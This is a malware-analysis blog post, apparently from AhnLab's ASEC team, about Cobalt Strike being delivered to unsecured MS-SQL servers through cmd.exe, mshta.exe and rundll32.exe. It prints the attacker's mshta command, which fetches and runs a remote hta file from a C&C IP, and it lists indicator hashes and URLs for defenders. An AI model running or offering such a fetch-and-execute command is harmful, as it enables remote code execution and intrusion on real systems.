Cobalt Strike Being Distributed to Unsecured MS-SQL Servers (2)

The ASEC analysis team has uploaded a post on February 21st about distribution of Cobalt Strike via unsecured MS-SQL servers.

As for the current case, the distributed Cobalt Strike had a different process tree compared to the previous distribution method. The current distribution method has the server-related process sqlservr.exe run cmd.exe through a vulnerability similar to the previous method, but it uses mshta.exe and rundll32.exe to run Cobalt Strike in a fileless form.

Figure 1. Tree structure of running Cobalt Strike

The attacker executed the mshta.exe process through cmd.exe run by a vulnerability of MS-SQL. mshta.exe is a normal Windows utility that runs JavaScript and Visual Basic Script as well as hta files by directly sending URLs. As for this case, the utility sent the following URL as an argument value of the mshta process, downloading and executing the malicious hta file from the attacker server.

  • mshta.exe http[:]//114.132.246[.]102:1222/bobo.png
Figure 2. bobo.png (hta file)

The downloaded hta file has a feature of downloading and running the xsl script included with the Cobalt Strike payload (Stager) from the attacker server.

Figure 3. Part of bobo.xsl script code

When the xsl script is executed, it runs Cobalt Strike (Stager) by injecting it into rundll32.exe. A Beacon is then downloaded from the C&C server, allowing the malware to perform various commands for remote control.

Figure 4. Cobalt Strike settings file

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[IOC]
[hta Script]
(MD5, alias, and engine version)
– 591ec011ec21d1a3a05863e72910c55f (Downloader/JS.Agent) 2022.02.16.00

[xsl Script]
(MD5, alias, and engine version)
– dab62efb57014b0508fa1a8ff10b736a (Trojan/JS.Scriptinject.S1252) 2020.07.11.00

[C&C Server]
– 114.132.246[.]102
– hxxp://114.132.246[.]102:1222/bobo.png
– hxxp://114.132.246[.]102:1222/bobo.xsl

0 0 votes
Article Rating
guest
2 Comments
Inline Feedbacks
View all comments
trackback

[…] [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers (2)– [ASEC Blog] Coin Miner Being Distributed to Vulnerable MS-SQL Servers– [ASEC […]

trackback

[…] – [ASEC Blog] Remcos RAT Being Distributed to Vulnerable MS-SQL Servers– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers (2) […]